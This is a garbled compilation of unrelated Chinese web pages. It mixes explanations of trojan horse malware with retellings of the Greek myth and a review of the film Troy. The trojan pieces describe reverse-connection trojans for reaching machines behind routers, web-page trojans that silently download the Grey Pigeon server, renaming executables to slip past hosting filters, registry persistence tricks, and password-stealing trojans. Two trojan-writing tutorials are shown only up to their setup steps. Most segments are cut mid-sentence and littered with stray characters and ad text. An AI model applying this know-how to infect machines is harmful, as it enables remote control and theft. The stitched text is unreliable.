菜鸟必懂的木马连接通用原理2009-01-04 17:55 目前常见的木马有三种:正向连接木马、反弹连接木马、收信木马。 正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他的端口。而我们要知道他的IP,才能够连接他。123就是他机器上开的端口。 由于到现在,宽带上网(动态IP)和路由器的普遍,这个软件就有很大的不足。 动态IP:每次拨号,IP都会跟换。所以,就算对方中了木马,在下次拨号的时候,我们会因为找不到IP而丢肉鸡。 路由器:就是多个电脑同用1条宽带(网吧上网就是最好的例子)他们通过路由器连接到宽带,例如:主机的IP为225.124.3.41,而内网(就是用路由器的机器)的IP为192.168.X.X.在内网环境下,我们外界是无法访问的,就是机器中了木马也没用。 简单来说,内网的机器是比较安全的,外界是无法访问的,就是我们连接不了内网器。而连接内网的机器,除非在同区域网里(在网吧A机,就能用RIDMIN连接网吧的B机)。 简单总结:在不同区域网下,正向木马只能连接到外网的机器,而不能连接到内网的机器。 由于一系列的不足,就产生了反弹连接木马,例如出门的国产软件:灰鸽子 反弹连接木马,就是在我们机器上开启一个端口,让中马者来连接我们,从而获得肉鸡的信息,就算对方的IP怎么改变,也是无际于事。如果我们自己机器上的IP改变了,肉鸡就无法找到我们的机器,从而无法获得肉鸡的信息,不过这点是不成问题的,WWW兴起,就有了域名。在网络中通过的对域名的访问能找到自己对应的IP地址,例如https://www.doczj.com/doc/1018491393.html, 的IP地址为22.181.38.4 如果百度的IP变成12.11.22.3的话,只要域名不改变,就算IP地址怎么变,它也能找到你。就算是内网的机器,我们也能获得他的信息。 总结到底:本地开启1个端口,肉鸡连接上我们,就算是内外网的机器也可以。 反弹连接木马最头疼的地方就是使用者是内网状态的(大家可以看我的路线图,蓝色为反弹连接,黑色为正常连接)。说到为什么最头疼,大家就回忆下正向连接木马的原理。别人是无法直接访问路由器内的机器(内网)。 读后评: 目前几种流行的木马的连接方式,知己知彼,百战百胜
如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。 以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。 一、网页木马的攻击原理 首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。 有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。 ⒈自动下载程序 小提示:代码说明 a. 代码中“src”的属性为程序的网络地址,本例中 “https://www.doczj.com/doc/1018491393.html,/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。 b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe改为bat或com,这样他们就可以把这些程序上传到服务器上了。 把这段代码插入到网页源代码的
目录 一木马的概述 (1) 二基础知识 (3) 三木马的运行 (4) 四信息泄露 (5) 五建立连接 (5) 六远程控制 (6) 七木马的防御 (7) 八参考文献 (7)
一 .木马的概述 特洛伊木马,英文叫做“Trojanhorse”,其名称取自希腊神话的特洛伊木马记,它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,对此无可奈何;所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。 从木马的发展来看,基本上可以分为两个阶段,最初网络还处于以UNIX平台为主的时期,木马就产生了,当时的木马程序的功能相对简单,往往是将一段程序嵌入到系统文件中,用跳转指令来执行一些木马的功能,在这个时期木马的设计者和使用者大都是些技术人员,必须具备相当的网络和编程知识。而后随着Windows平台的日益普及,一些基于图形操作的木马程序出现了,用户界面的改善,使使用者不用懂太多的专业知识就可以熟练地操作木马,相应的木马入侵事件也频繁出现,而且由于这个时期木马的功能已日趋完善,因此对服务端的破坏也更大了。 木马的种类繁多,但是限于种种原因,真正广泛使用的也只有少数几种,如BO,Subseven,冰河等。 1、BO2000有一个相当有用的功能,即隐藏木马进程,一旦将这项功能设备为enable,用ATM察看进程时,BO的木马进程将不会被发现。 2、在版本较高的Subseven中除常规的触发条件外,还提供有less know method和not know method两种触发方法。选择前者,运行木马后将SYSTEM.INI 中的Shell改为Shell=explorer.exe msrexe.exe,即用SYSTEM.INI触发木马,选择后者则会在c:\Windows\目录下创建一个名为Windows.exe程序,通过这个程序来触发木马,并将\HKEY-ROOT\exefile\shell\open\command\的键值“%1”、“%X”改为“Windows.exe”%1”、“%X,也就是说,即使我们把木马删除了,只要一运行EXE文件,Windows.exe马上又将木马安装上去,对于这种触发条件,我们只要将键值改回原值,并删除Windows.exe即可。 3、冰河的特殊触发条件和Subseven极为相似,它将\
特洛伊木马典故 特洛伊木马的故事是在古希腊传说中,希腊联军围困特洛伊久攻不下,于是假装撤退,留下一具巨大的中空木马,特洛伊守军不知是计,把木马运进城中作为战利品。夜深人静之际,木马腹中躲藏的希腊士兵打开城门,特洛伊沦陷。下面是给大家整理的特洛伊木马典故,供大家阅读! 特洛伊城是个十分坚固的城市,希腊人牺牲了众多将士,一连攻打了九年也没有取得胜利。第十年,希腊军多谋善断的将领奥德修斯想出了一条妙计。一天,希腊联军突然扬帆离开了特洛伊附近的海面,只留下一匹巨大的木马。特洛伊人认为屡次失败的希腊人无心打仗,撤军回国,于是跑到城外探个究竟。特洛伊人看到木马非常吃惊,他们实在不知道木马的用途。有人主张把它当作战利品拉进城去,有人建议把它烧掉或者推到海里。 就在人们议论纷纷,犹豫不决的时候,几个牧人抓到一个希腊人(希腊人留下的间谍)。他对特洛伊人说:“这匹木马是希腊人献给雅典娜女神的。他们故意把它留下来,认为你们肯定会毁掉它。这样就会引起天神的愤怒。如果把木马拉进城,特洛伊就会受到神的保护。为了让你们的行为引起天神的愤怒,所以故意把马造得非常巨大,这样你们就无法把木马拉进城去。”希腊人的这番话说服了国王普里阿墨斯。他吩咐放了那个俘虏,并且下令把木马弄进城去。
国王相信了这番话,正准备把木马拉进城时,祭司拉奥孔跑来制止,他认为应该立即把木马烧掉。木马发出了可怕的响声,这时从海里窜出两条毒蛇,扑向拉奥孔和他的两个儿子。拉奥孔父子拼命和巨蛇搏斗,但很快被蛇缠死了。两条巨蛇从容地钻到雅典娜女神的雕像下,不见了。 人们认为由于拉奥孔怀疑木马所以导致父子三人的悲惨遭遇,因此更加相信希腊间谍的话。特洛伊人在木马下面装上轮子,使劲把木马往城里拉。由于木马太巨大,城门口进不去,只好推倒一段城墙。特洛伊人把木马放在雅典娜神庙附近。希腊联军落荒而逃,特洛伊城终于平安无事了,特洛伊人欢天喜地,举行了盛大的庆祝活动。自认为取得胜利的特洛伊人放松了警惕,欢庆过后,人们安心地入睡了。 深夜时分,当人们纷纷进入熟睡中时,希腊间谍偷偷起床,燃起火把,向远方发出约定的信号。然后,他悄悄走近木马,轻轻敲了敲木马。躲藏在木马中的全副武装的战士一个接一个地跳了出来。他们悄悄地摸到城门边,消灭了睡梦中的守军,迅速打开城门。此时,已经来到城门口的希腊人如潮水般涌了进来。希腊人终于等到了报仇雪恨的机会,他们挥舞着武器,对醉酒和昏睡的特洛伊人进行大肆屠杀。希腊人还放火焚烧特洛伊城,整个特洛伊变成了一片火海。顷刻之间,曾经美丽富饶的特洛伊城变成了人间地狱,到处是哭喊声和悲叫声,到处是尸体。 就这样,持续十年之久的特洛伊战争结束了。希腊人把特洛伊城掠夺一空,烧成一片废墟,美丽的海伦也被希腊联军带回了希腊。
1. 特洛伊木馬程式原理7n 一、引言otnpy 特洛伊木馬是Trojan Horse 的中譯,是借自"木馬屠城記"中那只木馬的名稱。古希臘有大軍圍攻特洛伊城,逾年無法攻下。有人獻計製造一隻高二丈的大木馬假裝作戰馬神,攻擊數天後仍然無功,遂留下木馬拔營而去。城中得到解圍的消息,及得到"木馬"這個奇異的戰利品,全城飲酒狂歡。到午夜時份,全城軍民盡入夢鄉,匿於木馬中的將士開暗門垂繩而下,開啟城門及四處縱火,城外伏兵湧入,焚屠特洛伊城。後世稱這只木馬為"特洛伊木馬",現今電腦術語借用其名,意思是"一經進入,後患無窮"。特洛伊木馬原則上它和Laplink 、PCanywhere 等程式一樣,只是一種遠端管理工具。而且本身不帶傷害性,也沒有感染力,所以不能稱之為病毒(也有人稱之為第二代病毒);但卻常常被視之為病毒。原因是如果有人不當的使用,破壞力可以比病毒更強。iagavi ?摩尼BBS網路社區-- 音樂.歌詞.小遊戲.MTV.桌布.圖庫.笑話.影片.星座.下載.動漫畫.免費留言板申請BBS網路社區-- 音樂.歌詞.小遊戲.MTV.桌布.圖庫.笑話.影片.星座.下載.動漫畫.免費留言板申請E(/I 二、木馬攻擊原理cHt 特洛伊木馬是一個程式,它駐留在目標電腦裡,可以隨電腦自動啟動並在某一連接進行偵聽,在對接收的資料識別後,對目標電腦執行特定的****作。木馬,其實只是一個使用連接進行通訊的網路客戶/伺服器程式。e2/ 基本概念:網路客戶/伺服器模式的原理是一台主機提供伺服器(伺服端),另一台主機接受伺服器(客戶端)。作為伺服端的主機一般會開啟一個預設的連接埠並進行監聽(Listen),如果有客戶端向伺服端的這一連接埠提出連接請求(Connect Request),伺服端上的相對應程式就會自動執行,來回覆客戶端的請求。對於特洛伊木馬,被控制端就成為一台伺服器。DJ ?摩尼BBS網路社區-- 音樂.歌詞.小遊戲.MTV.桌布.圖庫.笑話.影片.星座.下載.動漫畫.免費留言板申請 G5 iCf 三、特洛伊木馬隱身方法= 木馬程式會想盡一切辦法隱藏自己,主要途徑有:在工作程序中隱形:將程式設為「系統伺服器」可以偽裝自己。當然它也會悄無聲息地啟動,木馬會在每次使用者啟動時自動載入伺服器端,Windows系統啟動時自動載入應用程式的方法,「木馬」都會用上,如:win.ini、system.ini、註冊表等等都是「木馬」藏身的好地方。/x$l_ 在win.ini檔案中,在[WINDOWS]下面,「run=」和「load=」是可能載入「木馬」程式的途徑,一般情況下,它們的等號後面什麼都沒有,如果發現後面跟有路徑與檔案名稱不是您熟悉的啟動檔案,電腦就可能中「木馬」了。當然也得看清楚,因為好多「木馬」,如「AOL Trojan木馬」,它把自身偽裝成command.exe 檔案,如果不注意可能不會發現它不是真正的系統啟動檔案。g(hmry 在system.ini檔案中,在[BOOT]下面有個「shell=檔案名稱」。正確的檔案名稱應該是「explorer.exe」,如果不是「explorer.exe」,而是「shell= explorer.exe 程式名」,那麼後面跟著的那個程式就是「木馬」程式,就是說已經中「木馬」了。H 在註冊表中的情況最複雜,使用regedit指令開啟註冊表編輯器,在點擊至:「HKEY-LOCAL-MACHINE \Software \Microsoft \Windows \Current Version \Run」目錄下,檢視鍵值中有沒有自己不熟悉的自動啟動檔案,副檔名為EXE,這裡切記:有的「木馬」程式產生的檔案很像系統自身檔案,想使用偽裝矇混過關,如「Acid Battery v1.0木馬」,它將註冊表「HKEY-LOCAL-MACHINE \SOFTWARE
盗号木马的原理及如何防范 随着互联网技术的迅速发展网络给人们带来了极大的便利,日益发达的网络产品越来越多。各种网络应用都离不开账号密码,账号密码是网络身份的一种标识。这些帐号密码所代表的是巨大的经济价值与个人的隐私。一些动机不纯的黑客高手就想尽办法利用灰色的网络技术和功能强大的盗号木马盗取相应的密码和帐号,给我们的生活带来难以言喻的困扰。 现在就盗号木马的特点和防范方法跟大家一起讨论一下,希望对于保护账号安全起到一定的帮助作用。 木马的特点 1 隐秘性 也就是说,一旦一个木马通过各种手段被引入了主机(这个过程称为“植入”),那么它首先要找到一个地方隐藏起来,等待时机发作,在被植入的主机看来就好像什么事情都没有。 2 自动运行性 一个好的木马绝对不可能奢望对方来点击运行,也不能只执行一次,然后随着系统的关机而不再运行,这样的只发作一次的木马是没有什么作用的。木马往往具有自动运行性,也就是说要么随机子的启动运行而发作,要么等某个条件来触发,而这个触发条件应该很常用的。 3 危害性 如果一个木马没有什么危害,那么它也就失去了入侵的目的,一个木马的危害性主要表现在控制性上,木马的制作者通过植入木马,然后非法获取系统的权限,达到最终控制对方机子的目的,比如它可以偷听你的密码(盗号),修改你的文件,下载感兴趣的文件,甚至格式化硬盘。 盗号木马的原理 1 偷梁换柱型 盗号者入侵你的电脑后,会把你的程序的快捷方式换成盗号者自己制作的登陆界面,当你打开“网络程序”登陆界面进行登陆的时候,第一次输入密码后,会提示密码错误等信息,同时记录下你的账号和密码,然后会自动跳转到真实的登陆串口,这时你就能真的登陆上去了,你不知道的是,其实你的资料已经发到盗号者的邮箱或者空间去了。 2 直接替换型 盗号者会直接把你“网络程序安装文件夹”里面的一些文件替换掉。然后不管你怎么打
特洛伊木马屠城从古至今,人类发动战争的理由各式各样,有的为了权力,有的为了名利,有的为了荣誉,有的为了爱情. 在古希腊历史上最着名的一对爱人,特洛伊城的王子帕里斯,以及斯巴达的皇后海伦,两人的爱情引发了一场毁灭文明的战争.当帕里斯把海伦从斯巴达之王身边偷走后,对他造成了无法忍耐的羞辱。他找到了自己的哥哥,迈锡尼国王阿伽门农,请求他的帮忙,阿伽门农正好也希望征服特洛伊,于是借此机会建立了一支希腊联军以讨伐特洛伊。在这支联军中,第一勇士自然是阿基里斯,桀骜不逊的阿基里斯并不打算向任何人臣服,他向特洛伊进发,是在为自己的名誉而战,而在影片中,我们将会发现,最终决定了他的命运的,是爱。 这本是希腊神话中的一个经典故事,也曾被写入《荷马史诗》中,现在被排成了电影,那么我们就先从电影本身来欣赏一下。 先谈一下画面效果吧,影片中古式战争的大场面拍的非常好,比武场面比较有吸引力。其中,第一勇士阿基里斯的跳跃式打法,显然吸收了一些东方的功夫样式,但不会像其他一些大片里边,动作过于夸张,就想空中飞人一样,给人一种不真实感。特洛伊王子赫克托屡次在乱军中勇战杀敌,真实感更强,有血有肉。到了双雄决斗,便达到了整部影片的高潮。希腊大军从海上登陆看上去更像是第二次世界大战诺曼底登陆的古装版,但效果却有待于提高。真正精彩的是特洛伊大军夜袭希腊大军营地,火攻情景设计独特,气势也是非常的磅礴。导演在整个影片中所有的设计都是以人类的自然力量出发,人力毕竟有限,尤其是人性中常有弄巧成拙的缺陷,所以影片中也存在很多令人扼腕的场景。影视作品嘛,来源于生活却又高于生活。其实史诗中特洛伊战争长达数十年,并不像影片中那样,一夜变被成功屠城的。本片大大浓缩,这个浓缩只是对时间上的浓缩,精华被没有被删除掉,这也是值得人们欣慰的一点。本片中,从海伦与二王子私奔到木
史少甫 20092420229 通信2班 一、什么是特洛伊木马 特洛伊木马(TrojanHorse,以下简称木马)的名称取自希腊神话的特洛伊木马记。木马就是指那些内部包含为完成特殊任务而编制的代码的程序,这些特殊功能处于隐藏状态,执行时不为人发觉。特洛伊木马是一种基于远程控制的工具,类似于远端管理软件,其区别是木马具有隐蔽性和非授权性的特点。所谓隐蔽性是指木马的设计者为防止木马被发现,会采用多种手段隐藏木马;非授权性是指一旦控制端与服务端建立连接后,控制端将窃取服务端的密码及大部分操作权限,包括修改文件、修改注册表、重启或关闭服务端操作系统、断开服务端网络连接、控制服务端的鼠标及键盘、监视服务端桌面操作、查看服务端进程等。这些权限并不是服务端赋予的,而是通过木马程序窃取的。木马”与计算机网络中常常要用到的远程控制软件有些相似,但由于远程控制软件是“善意”的控制,因此通常不具有隐蔽性;“木马”则完全相反,木马要达到的是“偷窃”性的远程控制,如果没有很强的隐蔽性的话,那就是“毫无价值”的。 一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。 1、硬件部分建立木马连接所必须的硬件实体。控制端:对服务端 进行远程控制的一方。服务端:被控制端远程控制的一方。 I NTERNET:控制端对服务端进行远程控制,数据传输的网络载体。 2、软件部分实现远程控制所必须的软件程序。控制端程序:控制端
用以远程控制服务端的程序。木马程序:潜入服务端内部,获取其 操作权限的程序。 木马配置程序:设置木马程序的端口号,触发条 件,木马名称等,使其在服务端藏得更隐蔽的程序。 3、具体连接部分 通过I NTERNET 在服务端和控制端之间建立一条木马通道所必须的元 素。 控制端I P,服务端I P:即控制端,服务端的网络地址,也是木 马进行数据传输的目的。 控制端端口,木马端口:即控制端,服务端的数据入口,通过这 个入口,数据可直达控制端程序或木马程序。 二.木马的特征 木马是病毒的一种,同时木马程序又有许多种不同的种类,那是受不同的人、不同时期开发来区别的,如BackOrifice(BO)、BackOrifice2019、Netspy、Picture、Netbus、Asylum、冰河等等这些都属于木马病毒种类。综合现在流行的木马程序,它们都有以下基本特征 1、隐蔽性是其首要的特征 如其它所有的病毒一样,木马也是一种病毒,它必需隐藏在你的系统之中,它会想尽一切办法不让你发现它。很多人的对木马和远程控制软件有点分不清,因为我前面讲了木马程序就要通过木马程序驻留目标机器后通过远程控制功能控制目标机器。实际上他们两者的最大区别就是在于这一点,这些黑客们早就想到 了方方面面可能发生的迹象,把它们扼杀了。大家所熟悉木马修改注册表和ini文件以便机器在下一次启动后仍能载入木马程式,它不是自己生成一个启动程序,而是依附在其它程序之中。有些把服务器端和正常程序绑定成一个程序的软件,叫做exe-binder绑定程式,可以让人在使用绑定的
特洛伊木马工作原理分析及清除方法 1 什么是特洛伊木马 特洛伊木马(Trojan Horse,以下简称木马)的名称取自希腊神话的特洛伊木马记。木马就是指那些内部包含为完成特殊任务而编制的代码的程序,这些特殊功能处于隐藏状态,执行时不为人发觉。特洛伊木马是一种基于远程控制的工具,类似于远端管理软件,其区别是木马具有隐蔽性和非授权性的特点。所谓隐蔽性是指木马的设计者为防止木马被发现,会采用多种手段隐藏木马;非授权性是指一旦控制端与服务端建立连接后,控制端将窃取服务端的密码及大部分操作权限,包括修改文件、修改注册表、重启或关闭服务端操作系统、断开服务端网络连接、控制服务端的鼠标及键盘、监视服务端桌面操作、查看服务端进程等。这些权限并不是服务端赋予的,而是通过木马程序窃取的。 2 木马的工作原理 完整的木马系统由硬件和软件二部分组成。硬件部分是建立木马连接所必须的硬件实体,包括控制端、服务端和数据传输的网络载体(Internet/Intranet);软件部分是实现远程控制所必须的软件程序,包括控制端程序和木马程序。利用木马窃取信息、恶意攻击的整个过程可以分为3个部分,下面详细介绍。 2.1 获取并传播木马 木马可以用C或C++语言编写。木马程序非常小,一般只有3~5KB,以便隐藏和传播。木马的传播方式主要有3种:(1)通过E-MAIL。(2)软件下载。(3)依托病毒传播。200 1年4月赛门铁克防病毒研究中心发现了植入木马程序的新蠕虫病毒(W32.BACTRANS.13 312@MM)。该病毒一旦被执行,木马程序就会修改注册表键值和win.ini文件。当计算机被重启时,该蠕虫会等候3 分钟,然后利用MAPI, 回复所有未读邮件,并将自己作为邮件的附件,使用不同的名称继续传播。 2.2 运行木马 服务端用户在运行木马或捆绑了木马的程序后,木马首先将自身拷贝到WINDOWS的系统文件夹中(C:\WINDOWS或C:\WINDOWS\SYSTEM目录下),然后在注册表、启动组和非启动组中设置好木马触发条件,这样木马的安装就完成了。以后,当木马被触发条件激活时,它就进入内存,并开启事先定义的木马端口,准备与控制端建立连接。 2.2 建立连接,进行控制 建立一个木马连接必须满足2个条件:(1)服务端已安装有木马程序。(2)控制端、服务端都要在线。初次连接时还需要知道服务端的IP地址。IP地址一般通过木马程序的信息反馈机制或扫描固定端口等方式得到。木马连接建立后,控制端端口和木马端口之间将会有一条通道,控制端程序利用该通道与服务端上的木马程序取得联系,并通过木马程序对服务端进行远程控制。 3 用VB6.0编写的木马程序 下面用VB6.0编写的一个木马程序来说明木马程序的工作原理。 (1)用VB建立2个程序:客户端程序Client和服务器端程序Server。 (2)在Client工程中建立一个窗体,加载WinSock控件,称为Win_Client,协议选择TCP。
目录 一、木马概述 (3) 1.木马的定义及特征 (3) 1.1木马的定义 (3) 1.2木马的特征 (3) 2.木马的工作原理 (4) 3.木马的分类 (5) 4.木马的功能 (6) 5.木马的工作过程 (7) 二、木马的传播方式 (8) 三、木马的清除 (9) 四、如何避免木马攻击 (9) 五、结语 (9) 六、参考文献 (10)
前言 木马技术是最常见的网络攻击手段之一,它对网络环境中计算机信息资源造成了很大的危害。文中介绍了木马程序的概念、基本原理和分类,针对常见的木马攻击方式提出了一些防范措施。 木马的危害,在于它能够远程控制你的电脑。当你成为“肉鸡”的时候,别人(控制端)就可以进入你的电脑,偷看你的文件、*密码、甚至用你的QQ发一些乱七八糟的东西给你的好友,木马大量出现,在于它有着直接的商业利益。一旦你的网上银行密码被盗,哭都来不及了。正因为如此,现在木马越繁殖越多,大有“野火烧不尽”之势。木马与病毒相互配合、相得益彰,危害越来越大。 【关键词】:木马程序、攻击手段、防范技术、木马的危害
一、木马概述 1.木马的定义及特征 1.1木马的定义 在古罗马的战争中,古罗马人利用一只巨大的木马,麻痹敌人,赢得了战役的胜利,成为一段历史佳话。而在当今的网络世界里,也有这样一种被称做木马的程序,它为自己带上伪装的面具,悄悄地潜入用户的系统,进行着不可告人的行动。 有关木马的定义有很多种,作者认为,木马是一种在远程计算机之间建立起连接,使远程计算机能够通过网络控制本地计算机的程序,它的运行遵照TCP/IP协议,由于它像间谍一样潜入用户的电脑,为其他人的攻击打开后门,与战争中的“木马”战术十分相似,因而得名木马程序。 木马程序一般由两部分组成的,分别是Server(服务)端程序和Client(客户)端程序。其中Server 端程序安装在被控制计算机上,Client端程序安装在控制计算机上,Server端程序和Client端程序建立起连接就可以实现对远程计算机的控制了。 首先,服务器端程序获得本地计算机的最高操作权限,当本地计算机连入网络后,客户端程序可以与服务器端程序直接建立起连接,并可以向服务器端程序发送各种基本的操作请求,并由服务器端程序完成这些请求,也就实现了对本地计算机的控制。 因为木马发挥作用必须要求服务器端程序和客户端程序同时存在,所以必须要求本地机器感染服务器端程序,服务器端程序是可执行程序,可以直接传播,也可以隐含在其他的可执行程序中传播,但木马本身不具备繁殖性和自动感染的功能。 1.2木马的特征 据不完全统计,目前世界上有上千种木马程序。虽然这些程序使用不同的程序设计语言进行编制,在不同的环境下运行,发挥着不同的作用,但是它们有着许多共同的特征。 (1)隐蔽性
前言: 特洛伊木馬是木馬屠城記裡記載著的那隻希臘軍隊用來攻破特洛伊城的大木馬。而木馬屠城記則是古希臘詩人 - 荷馬,在其兩部著作伊利亞特與奧德賽裡所記載的特洛伊戰爭的一部份。木馬屠城記一直被後人視為神話故事,直至十九世紀時,業餘考古學者蘇利曼才證實木馬屠城記真有此事。 目錄 1 戰爭起因 2 戰爭經過 3 對其他地方的影響 4 重新發掘 5 參看資料 6 外部連結
據荷馬與希臘神話所載,這個故事的起因是源自一個金蘋果。這個故事的開端,就是海洋女神忒提斯(Thetis)與希臘國王佩琉斯(Peleus)的婚禮,原本宙斯與忒提斯相戀,但那時傳說忒提斯的兒子(也就是未來的阿基里斯(Achilles))會比他的父親還強大,宙斯害怕當年推翻他父親的事重演,於是將她嫁給了著名英雄珀琉斯,避免影響他的政權。婚禮上邀請了很多神,唯獨麻煩女神愛伊絲(Eris)沒有被邀請。她很生氣,便拋出一個金蘋果,刻著「獻給最美麗的女神」。智慧女神雅典娜、愛神阿佛洛狄德和天后希拉都認為自己最有資格冠上蘋果上最美麗女神的美譽。為了解決這個難題,最後她們飛到艾達山請求特洛伊王子帕里斯仲裁。三個女神都試圖賄賂帕里斯:雅典娜答應讓帕里斯成為世界上最睿智的學者;希拉答應讓帕里斯成為天底下最有權勢的君王;阿佛洛狄德則以世界上最美麗的女子作為賄賂。最後帕里斯忠於感官天性選擇了阿佛洛狄德。作為回報,阿佛洛狄德施行魔咒,讓斯巴達王國的王后,公認為世界上最漂亮的女人海倫和帕里斯共墮愛河。海倫為了愛情拋棄了她的家鄉,丈夫莫內勞斯還有稚女。帕里斯的行動惹怒了斯巴達國王莫內勞斯,其怒不可抑,於是向兄長阿加曼農求援,並聯合希臘各城邦向特洛伊宣戰。↑ 戰爭經過: 斯巴達國王美內勞斯因為其太太海倫被帕里斯所帶走,因此向希臘各城邦求助,共同出兵特洛伊。總計有一 千艘希臘戰船及五萬名士兵參 戰。這場戰爭一打就是十年。但 特洛伊因為有亞馬遜女戰士和黎 明女神兒子梅農的幫忙,與維納 斯暗中協助,所以能抵抗希臘聯 軍。但因為雅典娜得不到金蘋 果,所以不願放過特洛伊,而且 指示奧德修斯向希臘聯軍獻上木 馬屠城之計。他們打造一隻巨大的木馬,裡面躲著伏兵,並佯裝撒退,讓特洛伊人將其當作戰利品帶回城內,藉此攻入特洛伊。希臘人進入特洛伊城後,燒殺擄掠,最後帶著戰利品滿載而歸。特洛伊戰爭終結束於希臘人的勝利。↑ 對其他地方的影響: 據古羅馬傳說所載,就在特洛伊城城破之際,有一人名為伊尼亞士(Aeneas)在亂軍中逃脫,並到達今天的義大利,成為羅馬人的始祖。而在特洛伊戰爭後,東地中海成為希臘人的天下,並使為希臘人能夠向小亞細亞殖民,這亦使東西方的文化有初步交流。↑
影片赏析之特洛伊木马 屠城 集团标准化工作小组 #Q8QGGQT-GX8G08Q8-GNQGJ8-MHHGN#
特洛伊木马屠城 从古至今,人类发动战争的理由各式各样,有的为了权力,有的为了名利,有的为了荣誉,有的为了爱情. 在古希腊历史上最着名的一对爱人,特洛伊城的王子帕里斯,以及斯巴达的皇后海伦,两人的爱情引发了一场毁灭文明的战争.当帕里斯把海伦从斯巴达之王身边偷走后,对他造成了无法忍耐的羞辱。他找到了自己的哥哥,迈锡尼国王阿伽门农,请求他的帮忙,阿伽门农正好也希望征服特洛伊,于是借此机会建立了一支希腊联军以讨伐特洛伊。在这支联军中,第一勇士自然是阿基里斯,桀骜不逊的阿基里斯并不打算向任何人臣服,他向特洛伊进发,是在为自己的名誉而战,而在影片中,我们将会发现,最终决定了他的命运的,是爱。 这本是希腊神话中的一个经典故事,也曾被写入《荷马史诗》中,现在被排成了电影,那么我们就先从电影本身来欣赏一下。 先谈一下画面效果吧,影片中古式战争的大场面拍的非常好,比武场面比较有吸引力。其中,第一勇士阿基里斯的跳跃式打法,显然吸收了一些东方的功夫样式,但不会像其他一些大片里边,动作过于夸张,就想空中飞人一样,给人一种不真实感。特洛伊王子赫克托屡次在乱军中勇战杀敌,真实感更强,有血有肉。到了双雄决斗,便达到了整部影片的高潮。希腊大军从海上登陆看上去更像是第二次世界大战诺曼底登陆的古装版,但效果却有待于提高。真正精彩的是特洛伊大军夜袭希腊大军营地,火攻情景设计独特,气势也是非常的磅礴。导演在整个影片中所有的设计都是以人类的自然力量出发,人力毕竟有限,尤其是人性中常有弄巧成拙的缺陷,所以影片中也存在很多令人扼腕的场景。影视作品嘛,来源于生活却又高于生活。其实史诗中特洛伊战争长达数十年,并不像影片中那样,一夜变被成功屠城的。本片大大浓缩,这个浓缩只是对时间上的浓缩,精华被没有被删除掉,这也是值得人们欣慰的一点。本片中,从海伦与二王子
木马的编写实例 特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷, 使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。 ?我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!要知道,木马(Trojan)的历史是很悠久的:早在AT&T Unix和BSDUnix 十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要方法是诱骗——先修改你的.pr ofile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的,对网络可以说很陌生。直到Win9x横空出世,尤其是WinNt的普及,大大推动了网络事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。 自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成——服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。? 首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C ++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗? 启动C++Builder5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Ser ver Socket,另两个是Fastnet页中的NM。Server 